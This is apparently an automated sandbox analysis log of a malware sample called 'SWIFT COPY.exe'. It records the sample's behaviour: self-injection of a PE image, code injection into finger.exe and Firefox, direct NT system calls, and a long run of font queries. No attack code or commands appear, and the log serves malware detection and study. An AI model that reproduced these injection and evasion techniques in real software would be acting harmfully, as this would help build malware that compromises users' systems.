                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory written: C:\Users\user\Desktop\SWIFT COPY.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: NULL target: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 8168Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"Jump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Users\user\Desktop\SWIFT COPY.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
